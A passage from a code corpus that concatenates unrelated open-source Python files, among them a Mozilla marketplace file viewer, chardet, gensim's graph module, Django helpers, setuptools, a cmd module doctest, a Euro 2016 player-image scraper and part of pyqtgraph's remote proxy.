addon-file. Full of all the useful information you'll need to serve
this file, build templates etc.
"""
if self._files:
return self._files
if not self.is_extracted():
return {}
# In case a cron job comes along and deletes the files
# mid tree building.
try:
self._files = self._get_files()
return self._files
except (OSError, IOError):
return {}
def truncate(self, filename, pre_length=15, post_length=10,
ellipsis=u'..'):
"""
Truncates a filename so that
somelongfilename.htm
becomes:
some...htm
as it truncates around the extension.
"""
root, ext = os.path.splitext(filename)
if len(root) > pre_length:
root = root[:pre_length] + ellipsis
if len(ext) > post_length:
ext = ext[:post_length] + ellipsis
return root + ext
def get_syntax(self, filename):
"""
Converts a filename into a syntax for the syntax highlighter, with
some modifications for specific common mozilla files.
The list of syntaxes is from:
http://alexgorbatchev.com/SyntaxHighlighter/manual/brushes/
"""
if filename:
short = os.path.splitext(filename)[1][1:]
syntax_map = {'xul': 'xml', 'rdf': 'xml', 'jsm': 'js',
'json': 'js', 'webapp': 'js'}
short = syntax_map.get(short, short)
if short in ['actionscript3', 'as3', 'bash', 'shell', 'cpp', 'c',
'c#', 'c-sharp', 'csharp', 'css', 'diff', 'html',
'java', 'javascript', 'js', 'jscript', 'patch',
'pas', 'php', 'plain', 'py', 'python', 'sass',
'scss', 'text', 'sql', 'vb', 'vbnet', 'xml', 'xhtml',
'xslt']:
return short
return 'plain'
@memoize(prefix='file-viewer', time=60 * 60)
def _get_files(self):
all_files, res = [], OrderedDict()
# Not using os.path.walk so we get just the right order.
def iterate(path):
path_dirs, path_files = private_storage.listdir(path)
for dirname in sorted(path_dirs):
full = os.path.join(path, dirname)
all_files.append(full)
iterate(full)
for filename in sorted(path_files):
full = os.path.join(path, filename)
all_files.append(full)
iterate(self.dest)
for path in all_files:
filename = smart_unicode(os.path.basename(path), errors='replace')
short = smart_unicode(path[len(self.dest) + 1:], errors='replace')
mime, encoding = mimetypes.guess_type(filename)
if not mime and filename == 'manifest.webapp':
mime = 'application/x-web-app-manifest+json'
if storage_is_remote():
# S3 doesn't have directories, so we check for names with this
# prefix and call it a directory if there are some.
subdirs, subfiles = private_storage.listdir(path)
directory = bool(subdirs or subfiles)
else:
directory = os.path.isdir(path)
res[short] = {
'binary': self._is_binary(mime, path),
'depth': short.count(os.sep),
'directory': directory,
'filename': filename,
'full': path,
'md5': get_md5(path) if not directory else '',
'mimetype': mime or 'application/octet-stream',
'syntax': self.get_syntax(filename),
'modified': (
time.mktime(
private_storage.modified_time(path).timetuple())
if not directory else 0),
'short': short,
'size': private_storage.size(path) if not directory else 0,
'truncated': self.truncate(filename),
'url': reverse('mkt.files.list',
args=[self.file.id, 'file', short]),
'url_serve': reverse('mkt.files.redirect',
args=[self.file.id, short]),
'version': self.file.version.version,
}
return res
class DiffHelper(object):
def __init__(self, left, right):
self.left = FileViewer(left)
self.right = FileViewer(right)
self.addon = self.left.addon
self.key = None
def __str__(self):
return '%s:%s' % (self.left, self.right)
def extract(self):
self.left.extract(), self.right.extract()
def cleanup(self):
self.left.cleanup(), self.right.cleanup()
def is_extracted(self):
return self.left.is_extracted() and self.right.is_extracted()
def get_url(self, short):
url_name = 'mkt.files.compare'
return reverse(url_name,
args=[self.left.file.id, self.right.file.id,
'file', short])
def get_files(self):
"""
Get the files from the primary and:
- remap any diffable ones to the compare url as opposed to the other
- highlight any diffs
"""
left_files = self.left.get_files()
right_files = self.right.get_files()
different = []
for key, file in left_files.items():
file['url'] = self.get_url(file['short'])
diff = file['md5'] != right_files.get(key, {}).get('md5')
file['diff'] = diff
if diff:
different.append(file)
# Now mark every directory above each different file as different.
for diff in different:
for depth in range(diff['depth']):
key = '/'.join(diff['short'].split('/')[:depth + 1])
if key in left_files:
left_files[key]['diff'] = True
return left_files
def get_deleted_files(self):
"""
Get files that exist in right, but not in left. These
are files that have been deleted between the two versions.
Every element will be marked as a diff.
"""
different = OrderedDict()
left_files = self.left.get_files()
right_files = self.right.get_files()
for key, file in right_files.items():
if key not in left_files:
copy = right_files[key]
copy.update({'url': self.get_url(file['short']), 'diff': True})
different[key] = copy
return different
def read_file(self):
"""Reads both selected files."""
return [self.left.read_file(allow_empty=True),
self.right.read_file(allow_empty=True)]
def select(self, key):
"""
Select a file and adds the file object to self.one and self.two
for later fetching.
"""
self.key = key
self.left.select(key)
self.right.select(key)
return self.left.selected and self.right.selected
def is_binary(self):
"""Tells you if both selected files are binary."""
return self.left.is_binary() or self.right.is_binary()
def is_diffable(self):
"""Tells you if the selected files are diffable."""
if not self.left.selected and not self.right.selected:
return False
for obj in [self.left, self.right]:
if obj.is_binary():
return False
if obj.is_directory():
return False
return True
def rmtree(prefix):
dirs, files = private_storage.listdir(prefix)
for fname in files:
private_storage.delete(os.path.join(prefix, fname))
for d in dirs:
rmtree(os.path.join(prefix, d))
private_storage.delete(prefix)
|
orekyuu/intellij-community
|
refs/heads/master
|
python/testData/quickFixes/PyMoveAttributeToInitQuickFixTest/addSuperCall_after.py
|
79
|
__author__ = 'ktisha'
class Base(object):
def __init__(self):
self.param = 2
class Child(Base):
def __init__(self):
super(Child, self).__init__()
self.my = 2
def f(self):
pass
|
sharad/calibre
|
refs/heads/master
|
src/chardet/charsetprober.py
|
216
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, re
class CharSetProber:
def __init__(self):
pass
def reset(self):
self._mState = constants.eDetecting
def get_charset_name(self):
return None
def feed(self, aBuf):
pass
def get_state(self):
return self._mState
def get_confidence(self):
return 0.0
def filter_high_bit_only(self, aBuf):
aBuf = re.sub(r'([\x00-\x7F])+', ' ', aBuf)
return aBuf
def filter_without_english_letters(self, aBuf):
aBuf = re.sub(r'([A-Za-z])+', ' ', aBuf)
return aBuf
def filter_with_english_letters(self, aBuf):
# TODO
return aBuf
|
Kreiswolke/gensim
|
refs/heads/develop
|
gensim/summarization/graph.py
|
65
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
from abc import ABCMeta, abstractmethod
class IGraph(object):
""" Represents the interface or contract that the graph for TextRank
should implement.
"""
__metaclass__ = ABCMeta
@abstractmethod
def nodes(self):
"""
Return node list.
@rtype: list
@return: Node list.
"""
pass
@abstractmethod
def edges(self):
"""
Return all edges in the graph.
@rtype: list
@return: List of all edges in the graph.
"""
pass
@abstractmethod
def neighbors(self, node):
"""
Return all nodes that are directly accessible from given node.
@type node: node
@param node: Node identifier
@rtype: list
@return: List of nodes directly accessible from given node.
"""
pass
@abstractmethod
def has_node(self, node):
"""
Return whether the requested node exists.
@type node: node
@param node: Node identifier
@rtype: boolean
@return: Truth-value for node existence.
"""
pass
@abstractmethod
def add_node(self, node, attrs=None):
"""
Add given node to the graph.
@attention: While nodes can be of any type, it's strongly recommended
to use only numbers and single-line strings as node identifiers if you
intend to use write().
@type node: node
@param node: Node identifier.
@type attrs: list
@param attrs: List of node attributes specified as (attribute, value)
tuples.
"""
pass
@abstractmethod
def add_edge(self, edge, wt=1, label='', attrs=[]):
"""
Add an edge to the graph connecting two nodes.
An edge, here, is a pair of nodes like C{(n, m)}.
@type edge: tuple
@param edge: Edge.
@type wt: number
@param wt: Edge weight.
@type label: string
@param label: Edge label.
@type attrs: list
@param attrs: List of node attributes specified as (attribute, value)
tuples.
"""
pass
@abstractmethod
def has_edge(self, edge):
"""
Return whether an edge exists.
@type edge: tuple
@param edge: Edge.
@rtype: boolean
@return: Truth-value for edge existence.
"""
pass
@abstractmethod
def edge_weight(self, edge):
"""
Get the weight of an edge.
@type edge: edge
@param edge: One edge.
@rtype: number
@return: Edge weight.
"""
pass
@abstractmethod
def del_node(self, node):
"""
Remove a node from the graph.
@type node: node
@param node: Node identifier.
"""
pass
class Graph(IGraph):
"""
Implementation of an undirected graph, based on Pygraph
"""
WEIGHT_ATTRIBUTE_NAME = "weight"
DEFAULT_WEIGHT = 0
LABEL_ATTRIBUTE_NAME = "label"
DEFAULT_LABEL = ""
def __init__(self):
# Metadata about edges
# Mapping: Edge -> Dict mapping, lablel-> str, wt->num
self.edge_properties = {}
# Key value pairs: (Edge -> Attributes)
self.edge_attr = {}
# Metadata about nodes
# Pairing: Node -> Attributes
self.node_attr = {}
# Pairing: Node -> Neighbors
self.node_neighbors = {}
def has_edge(self, edge):
u, v = edge
return (u, v) in self.edge_properties and (v, u) in self.edge_properties
def edge_weight(self, edge):
return self.get_edge_properties(edge).setdefault(self.WEIGHT_ATTRIBUTE_NAME, self.DEFAULT_WEIGHT)
def neighbors(self, node):
return self.node_neighbors[node]
def has_node(self, node):
return node in self.node_neighbors
def add_edge(self, edge, wt=1, label='', attrs=[]):
u, v = edge
if v not in self.node_neighbors[u] and u not in self.node_neighbors[v]:
self.node_neighbors[u].append(v)
if u != v:
self.node_neighbors[v].append(u)
self.add_edge_attributes((u, v), attrs)
self.set_edge_properties((u, v), label=label, weight=wt)
else:
raise ValueError("Edge (%s, %s) already in graph" % (u, v))
def add_node(self, node, attrs=None):
if attrs is None:
attrs = []
if node not in self.node_neighbors:
self.node_neighbors[node] = []
self.node_attr[node] = attrs
else:
raise ValueError("Node %s already in graph" % node)
def nodes(self):
return list(self.node_neighbors.keys())
def edges(self):
return [a for a in self.edge_properties.keys()]
def del_node(self, node):
for each in list(self.neighbors(node)):
if each != node:
self.del_edge((each, node))
del self.node_neighbors[node]
del self.node_attr[node]
# Helper methods
def get_edge_properties(self, edge):
return self.edge_properties.setdefault(edge, {})
def add_edge_attributes(self, edge, attrs):
for attr in attrs:
self.add_edge_attribute(edge, attr)
def add_edge_attribute(self, edge, attr):
self.edge_attr[edge] = self.edge_attributes(edge) + [attr]
if edge[0] != edge[1]:
self.edge_attr[(edge[1], edge[0])] = self.edge_attributes((edge[1], edge[0])) + [attr]
def edge_attributes(self, edge):
try:
return self.edge_attr[edge]
except KeyError:
return []
def set_edge_properties(self, edge, **properties):
self.edge_properties.setdefault(edge, {}).update(properties)
if edge[0] != edge[1]:
self.edge_properties.setdefault((edge[1], edge[0]), {}).update(properties)
def del_edge(self, edge):
u, v = edge
self.node_neighbors[u].remove(v)
self.del_edge_labeling((u, v))
if u != v:
self.node_neighbors[v].remove(u)
self.del_edge_labeling((v, u))
def del_edge_labeling(self, edge):
keys = [edge]
keys.append(edge[::-1])
for key in keys:
for mapping in [self.edge_properties, self.edge_attr]:
try:
del mapping[key]
except KeyError:
pass
|
otherness-space/myProject
|
refs/heads/master
|
my_project_001/lib/python2.7/site-packages/django/core/mail/backends/console.py
|
137
|
"""
Email backend that writes messages to console instead of sending them.
"""
import sys
import threading
from django.core.mail.backends.base import BaseEmailBackend
class EmailBackend(BaseEmailBackend):
def __init__(self, *args, **kwargs):
self.stream = kwargs.pop('stream', sys.stdout)
self._lock = threading.RLock()
super(EmailBackend, self).__init__(*args, **kwargs)
def send_messages(self, email_messages):
"""Write all messages to the stream in a thread-safe way."""
if not email_messages:
return
with self._lock:
try:
stream_created = self.open()
for message in email_messages:
self.stream.write('%s\n' % message.message().as_string())
self.stream.write('-' * 79)
self.stream.write('\n')
self.stream.flush() # flush after each message
if stream_created:
self.close()
except:
if not self.fail_silently:
raise
return len(email_messages)
|
anton-golubkov/Garland
|
refs/heads/master
|
src/ipf/ipfblock/connection.py
|
1
|
#-------------------------------------------------------------------------------
# Copyright (c) 2011 Anton Golubkov.
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the GNU Lesser Public License v2.1
# which accompanies this distribution, and is available at
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
#
# Contributors:
# Anton Golubkov - initial API and implementation
#-------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
import ioport
import weakref
class Connection(object):
""" Connection class for IPFBlock
Connection binding OPort and IPort of some IPFBlocks
"""
def __init__(self, oport, iport):
# Check port compatibility and free of input port
if ioport.is_connect_allowed(oport, iport):
self._oport = weakref.ref(oport)
self._iport = weakref.ref(iport)
self._oport().increase_binded_count()
self._iport().set_binded()
else:
raise ValueError("Can not create Connection with given ports")
def __del__(self):
if self._oport() is not None:
self._oport().decrease_binded_count()
if self._iport() is not None:
self._iport().set_free()
def contains_port(self, port):
return self._iport() == port or self._oport() == port
def process(self):
""" Send value from output port to input port """
self._iport().pass_value(self._oport().get_value())
|
faun/django_test
|
refs/heads/master
|
django/shortcuts/__init__.py
|
81
|
"""
This module collects helper functions and classes that "span" multiple levels
of MVC. In other words, these functions/classes introduce controlled coupling
for convenience's sake.
"""
from django.template import loader
from django.http import HttpResponse, Http404
from django.http import HttpResponseRedirect, HttpResponsePermanentRedirect
from django.db.models.manager import Manager
from django.db.models.query import QuerySet
from django.core import urlresolvers
def render_to_response(*args, **kwargs):
"""
Returns a HttpResponse whose content is filled with the result of calling
django.template.loader.render_to_string() with the passed arguments.
"""
httpresponse_kwargs = {'mimetype': kwargs.pop('mimetype', None)}
return HttpResponse(loader.render_to_string(*args, **kwargs), **httpresponse_kwargs)
def redirect(to, *args, **kwargs):
"""
Returns an HttpResponseRedirect to the apropriate URL for the arguments
passed.
The arguments could be:
* A model: the model's `get_absolute_url()` function will be called.
* A view name, possibly with arguments: `urlresolvers.reverse()` will
be used to reverse-resolve the name.
* A URL, which will be used as-is for the redirect location.
By default issues a temporary redirect; pass permanent=True to issue a
permanent redirect
"""
if kwargs.pop('permanent', False):
redirect_class = HttpResponsePermanentRedirect
else:
redirect_class = HttpResponseRedirect
# If it's a model, use get_absolute_url()
if hasattr(to, 'get_absolute_url'):
return redirect_class(to.get_absolute_url())
# Next try a reverse URL resolution.
try:
return redirect_class(urlresolvers.reverse(to, args=args, kwargs=kwargs))
except urlresolvers.NoReverseMatch:
# If this is a callable, re-raise.
if callable(to):
raise
# If this doesn't "feel" like a URL, re-raise.
if '/' not in to and '.' not in to:
raise
# Finally, fall back and assume it's a URL
return redirect_class(to)
def _get_queryset(klass):
"""
Returns a QuerySet from a Model, Manager, or QuerySet. Created to make
get_object_or_404 and get_list_or_404 more DRY.
"""
if isinstance(klass, QuerySet):
return klass
elif isinstance(klass, Manager):
manager = klass
else:
manager = klass._default_manager
return manager.all()
def get_object_or_404(klass, *args, **kwargs):
"""
Uses get() to return an object, or raises a Http404 exception if the object
does not exist.
klass may be a Model, Manager, or QuerySet object. All other passed
arguments and keyword arguments are used in the get() query.
Note: Like with get(), an MultipleObjectsReturned will be raised if more than one
object is found.
"""
queryset = _get_queryset(klass)
try:
return queryset.get(*args, **kwargs)
except queryset.model.DoesNotExist:
raise Http404('No %s matches the given query.' % queryset.model._meta.object_name)
def get_list_or_404(klass, *args, **kwargs):
"""
Uses filter() to return a list of objects, or raise a Http404 exception if
the list is empty.
klass may be a Model, Manager, or QuerySet object. All other passed
arguments and keyword arguments are used in the filter() query.
"""
queryset = _get_queryset(klass)
obj_list = list(queryset.filter(*args, **kwargs))
if not obj_list:
raise Http404('No %s matches the given query.' % queryset.model._meta.object_name)
return obj_list
|
dinhkhanh/trac
|
refs/heads/master
|
trac/tests/resource.py
|
6
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007-2009 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
import doctest
import unittest
from trac import resource
class ResourceTestCase(unittest.TestCase):
def test_equals(self):
# Plain equalities
self.assertEqual(resource.Resource(), resource.Resource())
self.assertEqual(resource.Resource(None), resource.Resource())
self.assertEqual(resource.Resource('wiki'), resource.Resource('wiki'))
self.assertEqual(resource.Resource('wiki', 'WikiStart'),
resource.Resource('wiki', 'WikiStart'))
self.assertEqual(resource.Resource('wiki', 'WikiStart', 42),
resource.Resource('wiki', 'WikiStart', 42))
# Inequalities
self.assertNotEqual(resource.Resource('wiki', 'WikiStart', 42),
resource.Resource('wiki', 'WikiStart', 43))
self.assertNotEqual(resource.Resource('wiki', 'WikiStart', 0),
resource.Resource('wiki', 'WikiStart', None))
# Resource hierarchy
r1 = resource.Resource('attachment', 'file.txt')
r1.parent = resource.Resource('wiki', 'WikiStart')
r2 = resource.Resource('attachment', 'file.txt')
r2.parent = resource.Resource('wiki', 'WikiStart')
self.assertEqual(r1, r2)
r2.parent = r2.parent(version=42)
self.assertNotEqual(r1, r2)
def suite():
suite = unittest.TestSuite()
suite.addTest(doctest.DocTestSuite(resource))
suite.addTest(unittest.makeSuite(ResourceTestCase, 'test'))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
sw-irou/flasktest
|
refs/heads/master
|
lib/setuptools/command/install_lib.py
|
454
|
from distutils.command.install_lib import install_lib as _install_lib
import os
class install_lib(_install_lib):
"""Don't add compiled flags to filenames of non-Python files"""
def _bytecode_filenames (self, py_filenames):
bytecode_files = []
for py_file in py_filenames:
if not py_file.endswith('.py'):
continue
if self.compile:
bytecode_files.append(py_file + "c")
if self.optimize > 0:
bytecode_files.append(py_file + "o")
return bytecode_files
def run(self):
self.build()
outfiles = self.install()
if outfiles is not None:
# always compile, in case we have any extension stubs to deal with
self.byte_compile(outfiles)
def get_exclusions(self):
exclude = {}
nsp = self.distribution.namespace_packages
if (nsp and self.get_finalized_command('install')
.single_version_externally_managed
):
for pkg in nsp:
parts = pkg.split('.')
while parts:
pkgdir = os.path.join(self.install_dir, *parts)
for f in '__init__.py', '__init__.pyc', '__init__.pyo':
exclude[os.path.join(pkgdir,f)] = 1
parts.pop()
return exclude
def copy_tree(
self, infile, outfile,
preserve_mode=1, preserve_times=1, preserve_symlinks=0, level=1
):
assert preserve_mode and preserve_times and not preserve_symlinks
exclude = self.get_exclusions()
if not exclude:
return _install_lib.copy_tree(self, infile, outfile)
# Exclude namespace package __init__.py* files from the output
from setuptools.archive_util import unpack_directory
from distutils import log
outfiles = []
def pf(src, dst):
if dst in exclude:
log.warn("Skipping installation of %s (namespace package)",dst)
return False
log.info("copying %s -> %s", src, os.path.dirname(dst))
outfiles.append(dst)
return dst
unpack_directory(infile, outfile, pf)
return outfiles
def get_outputs(self):
outputs = _install_lib.get_outputs(self)
exclude = self.get_exclusions()
if exclude:
return [f for f in outputs if f not in exclude]
return outputs
|
cloudera/hue
|
refs/heads/master
|
desktop/core/ext-py/SQLAlchemy-1.3.17/examples/dogpile_caching/advanced.py
|
4
|
"""Illustrate usage of Query combined with the FromCache option,
including front-end loading, cache invalidation and collection caching.
"""
from .caching_query import FromCache
from .caching_query import RelationshipCache
from .environment import Session
from .model import cache_address_bits
from .model import Person
def load_name_range(start, end, invalidate=False):
"""Load Person objects on a range of names.
start/end are integers, range is then
"person <start>" - "person <end>".
The cache option we set up is called "name_range", indicating
a range of names for the Person class.
The `Person.addresses` collections are also cached. Its basically
another level of tuning here, as that particular cache option
can be transparently replaced with joinedload(Person.addresses).
The effect is that each Person and their Address collection
is cached either together or separately, affecting the kind of
SQL that emits for unloaded Person objects as well as the distribution
of data within the cache.
"""
q = (
Session.query(Person)
.filter(
Person.name.between("person %.2d" % start, "person %.2d" % end)
)
.options(cache_address_bits)
.options(FromCache("default", "name_range"))
)
# have the "addresses" collection cached separately
# each lazyload of Person.addresses loads from cache.
q = q.options(RelationshipCache(Person.addresses, "default"))
# alternatively, eagerly load the "addresses" collection, so that they'd
# be cached together. This issues a bigger SQL statement and caches
# a single, larger value in the cache per person rather than two
# separate ones.
# q = q.options(joinedload(Person.addresses))
# if requested, invalidate the cache on current criterion.
if invalidate:
q.invalidate()
return q.all()
print("two through twelve, possibly from cache:\n")
print(", ".join([p.name for p in load_name_range(2, 12)]))
print("\ntwenty five through forty, possibly from cache:\n")
print(", ".join([p.name for p in load_name_range(25, 40)]))
# loading them again, no SQL is emitted
print("\ntwo through twelve, from the cache:\n")
print(", ".join([p.name for p in load_name_range(2, 12)]))
# but with invalidate, they are
print("\ntwenty five through forty, invalidate first:\n")
print(", ".join([p.name for p in load_name_range(25, 40, True)]))
# illustrate the address loading from either cache/already
# on the Person
print(
"\n\nPeople plus addresses, two through twelve, addresses "
"possibly from cache"
)
for p in load_name_range(2, 12):
print(p.format_full())
# illustrate the address loading from either cache/already
# on the Person
print("\n\nPeople plus addresses, two through twelve, addresses from cache")
for p in load_name_range(2, 12):
print(p.format_full())
print(
"\n\nIf this was the first run of advanced.py, try "
"a second run. Only one SQL statement will be emitted."
)
|
fighterCui/L4ReFiascoOC
|
refs/heads/master
|
l4/pkg/python/contrib/Lib/test/test_cmd.py
|
56
|
#!/usr/bin/env python
"""
Test script for the 'cmd' module
Original by Michael Schneider
"""
import cmd
import sys
class samplecmdclass(cmd.Cmd):
"""
Instance the sampleclass:
>>> mycmd = samplecmdclass()
Test for the function parseline():
>>> mycmd.parseline("")
(None, None, '')
>>> mycmd.parseline("?")
('help', '', 'help ')
>>> mycmd.parseline("?help")
('help', 'help', 'help help')
>>> mycmd.parseline("!")
('shell', '', 'shell ')
>>> mycmd.parseline("!command")
('shell', 'command', 'shell command')
>>> mycmd.parseline("func")
('func', '', 'func')
>>> mycmd.parseline("func arg1")
('func', 'arg1', 'func arg1')
Test for the function onecmd():
>>> mycmd.onecmd("")
>>> mycmd.onecmd("add 4 5")
9
>>> mycmd.onecmd("")
9
>>> mycmd.onecmd("test")
*** Unknown syntax: test
Test for the function emptyline():
>>> mycmd.emptyline()
*** Unknown syntax: test
Test for the function default():
>>> mycmd.default("default")
*** Unknown syntax: default
Test for the function completedefault():
>>> mycmd.completedefault()
This is the completedefault methode
>>> mycmd.completenames("a")
['add']
Test for the function completenames():
>>> mycmd.completenames("12")
[]
>>> mycmd.completenames("help")
['help', 'help']
Test for the function complete_help():
>>> mycmd.complete_help("a")
['add']
>>> mycmd.complete_help("he")
['help', 'help']
>>> mycmd.complete_help("12")
[]
Test for the function do_help():
>>> mycmd.do_help("testet")
*** No help on testet
>>> mycmd.do_help("add")
help text for add
>>> mycmd.onecmd("help add")
help text for add
>>> mycmd.do_help("")
<BLANKLINE>
Documented commands (type help <topic>):
========================================
add
<BLANKLINE>
Undocumented commands:
======================
exit help shell
<BLANKLINE>
Test for the function print_topics():
>>> mycmd.print_topics("header", ["command1", "command2"], 2 ,10)
header
======
command1
command2
<BLANKLINE>
Test for the function columnize():
>>> mycmd.columnize([str(i) for i in xrange(20)])
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
>>> mycmd.columnize([str(i) for i in xrange(20)], 10)
0 7 14
1 8 15
2 9 16
3 10 17
4 11 18
5 12 19
6 13
This is a interactive test, put some commands in the cmdqueue attribute
and let it execute
This test includes the preloop(), postloop(), default(), emptyline(),
parseline(), do_help() functions
>>> mycmd.use_rawinput=0
>>> mycmd.cmdqueue=["", "add", "add 4 5", "help", "help add","exit"]
>>> mycmd.cmdloop()
Hello from preloop
help text for add
*** invalid number of arguments
9
<BLANKLINE>
Documented commands (type help <topic>):
========================================
add
<BLANKLINE>
Undocumented commands:
======================
exit help shell
<BLANKLINE>
help text for add
Hello from postloop
"""
def preloop(self):
print "Hello from preloop"
def postloop(self):
print "Hello from postloop"
def completedefault(self, *ignored):
print "This is the completedefault methode"
return
def complete_command(self):
print "complete command"
return
def do_shell(self):
pass
def do_add(self, s):
l = s.split()
if len(l) != 2:
print "*** invalid number of arguments"
return
try:
l = [int(i) for i in l]
except ValueError:
print "*** arguments should be numbers"
return
print l[0]+l[1]
def help_add(self):
print "help text for add"
return
def do_exit(self, arg):
return True
def test_main(verbose=None):
from test import test_support, test_cmd
test_support.run_doctest(test_cmd, verbose)
import trace, sys
def test_coverage(coverdir):
tracer=trace.Trace(ignoredirs=[sys.prefix, sys.exec_prefix,],
trace=0, count=1)
tracer.run('reload(cmd);test_main()')
r=tracer.results()
print "Writing coverage results..."
r.write_results(show_missing=True, summary=True, coverdir=coverdir)
if __name__ == "__main__":
if "-c" in sys.argv:
test_coverage('/tmp/cmd.cover')
else:
test_main()
|
pedrotari7/euro
|
refs/heads/master
|
players.py
|
1
|
import requests,os
import urllib
from bs4 import BeautifulSoup as BS
main = 'https://en.wikipedia.org'
link = main + '/wiki/UEFA_Euro_2016_squads'
r = requests.get(link)
s = BS(r.text,'lxml')
tables = s.findAll(attrs={"class":"sortable"})
teams_name = [t.text for t in s.findAll(attrs={"class":"mw-headline"}) if 'Group' not in t.text and 'By ' not in t.text and 'References' not in t.text and 'Player' not in t.text]
teams = dict()
for i,team_table in enumerate(tables):
path = os.path.join('images','teams',teams_name[i])
if not os.path.exists(path):
os.mkdir(path)
teams[teams_name[i]] = []
for player in team_table.findAll('th'):
if player.attrs['scope'] == 'row':
new_player = dict()
new_player['link'] = player.a.attrs['href']
new_player['name'] = player.a.text
teams[teams_name[i]].append(new_player)
print new_player['name']
r1 = requests.get(main + new_player['link'])
s1 = BS(r1.text,'lxml')
image = s1.find_all('a',{'class':'image'})
if len(image) > 0:
new_player['image'] = 'http:' + image[0].img['src']
print new_player['image']
urllib.urlretrieve(new_player['image'], os.path.join('images','teams',teams_name[i],new_player['name']+'.jpg'))
#teams[teams_name[i]] = [player for j,player in enumerate(teams[teams_name[i]]) if j%2==0]
|
m11s/MissionPlanner
|
refs/heads/master
|
Lib/ctypes/_endian.py
|
51
|
######################################################################
# This file should be kept compatible with Python 2.3, see PEP 291. #
######################################################################
import sys
from ctypes import *
_array_type = type(c_int * 3)
def _other_endian(typ):
"""Return the type with the 'other' byte order. Simple types like
c_int and so on already have __ctype_be__ and __ctype_le__
attributes which contain the types, for more complicated types
only arrays are supported.
"""
try:
return getattr(typ, _OTHER_ENDIAN)
except AttributeError:
if type(typ) == _array_type:
return _other_endian(typ._type_) * typ._length_
raise TypeError("This type does not support other endian: %s" % typ)
class _swapped_meta(type(Structure)):
def __setattr__(self, attrname, value):
if attrname == "_fields_":
fields = []
for desc in value:
name = desc[0]
typ = desc[1]
rest = desc[2:]
fields.append((name, _other_endian(typ)) + rest)
value = fields
super(_swapped_meta, self).__setattr__(attrname, value)
################################################################
# Note: The Structure metaclass checks for the *presence* (not the
# value!) of a _swapped_bytes_ attribute to determine the bit order in
# structures containing bit fields.
if sys.byteorder == "little":
_OTHER_ENDIAN = "__ctype_be__"
LittleEndianStructure = Structure
class BigEndianStructure(Structure):
"""Structure with big endian byte order"""
__metaclass__ = _swapped_meta
_swappedbytes_ = None
elif sys.byteorder == "big":
_OTHER_ENDIAN = "__ctype_le__"
BigEndianStructure = Structure
class LittleEndianStructure(Structure):
"""Structure with little endian byte order"""
__metaclass__ = _swapped_meta
_swappedbytes_ = None
else:
raise RuntimeError("Invalid byteorder")
|
isaacyeaton/pyadisi
|
refs/heads/develop
|
pyadisi/pyqtgraph/multiprocess/remoteproxy.py
|
4
|
import os, time, sys, traceback, weakref
import numpy as np
try:
import __builtin__ as builtins
import cPickle as pickle
except ImportError:
import builtins
import pickle
# color printing for debugging
from ..util import cprint
class ClosedError(Exception):
"""Raised when an event handler receives a request to close the connection
or discovers that the connection has been closed."""
pass
class NoResultError(Exception):
"""Raised when a request for the return value of a remote call fails
because the call has not yet returned."""
pass
class RemoteEventHandler(object):
"""
This class handles communication between two processes. One instance is present on
each process and listens for communication from the other process. This enables
(amongst other things) ObjectProxy instances to look up their attributes and call
their methods.
This class is responsible for carrying out actions on behalf of the remote process.
Each instance holds one end of a Connection which allows python
objects to be passed between processes.
For the most common operations, see _import(), close(), and transfer()
To handle and respond to incoming requests, RemoteEventHandler requires that its
processRequests method is called repeatedly (this is usually handled by the Process
classes defined in multiprocess.processes).
"""
handlers = {} ## maps {process ID : handler}. This allows unpickler to determine which process
## an object proxy belongs to
def __init__(self, connection, name, pid, debug=False):
self.debug = debug
self.conn = connection
self.name = name
self.results = {} ## reqId: (status, result); cache of request results received from the remote process
## status is either 'result' or 'error'
## if 'error', then result will be (exception, formatted exceprion)
## where exception may be None if it could not be passed through the Connection.
self.proxies = {} ## maps {weakref(proxy): proxyId}; used to inform the remote process when a proxy has been deleted.
## attributes that affect the behavior of the proxy.
## See ObjectProxy._setProxyOptions for description
self.proxyOptions = {
'callSync': 'sync', ## 'sync', 'async', 'off'
'timeout': 10, ## float
'returnType': 'auto', ## 'proxy', 'value', 'auto'
'autoProxy': False, ## bool
'deferGetattr': False, ## True, False
'noProxyTypes': [ type(None), str, int, float, tuple, list, dict, LocalObjectProxy, ObjectProxy ],
}
self.nextRequestId = 0
self.exited = False
RemoteEventHandler.handlers[pid] = self ## register this handler as the one communicating with pid
@classmethod
def getHandler(cls, pid):
try:
return cls.handlers[pid]
except:
print(pid, cls.handlers)
raise
def debugMsg(self, msg):
if not self.debug:
return
cprint.cout(self.debug, "[%d] %s\n" % (os.getpid(), str(msg)), -1)
def getProxyOption(self, opt):
return self.proxyOptions[opt]
def setProxyOptions(self, **kwds):
"""
Set the default behavior options for object proxies.
See ObjectProxy._setProxyOptions for more info.
"""
self.proxyOptions.update(kwds)
def processRequests(self):
"""Process all pending requests from the pipe, return
after no more events are immediately available. (non-blocking)
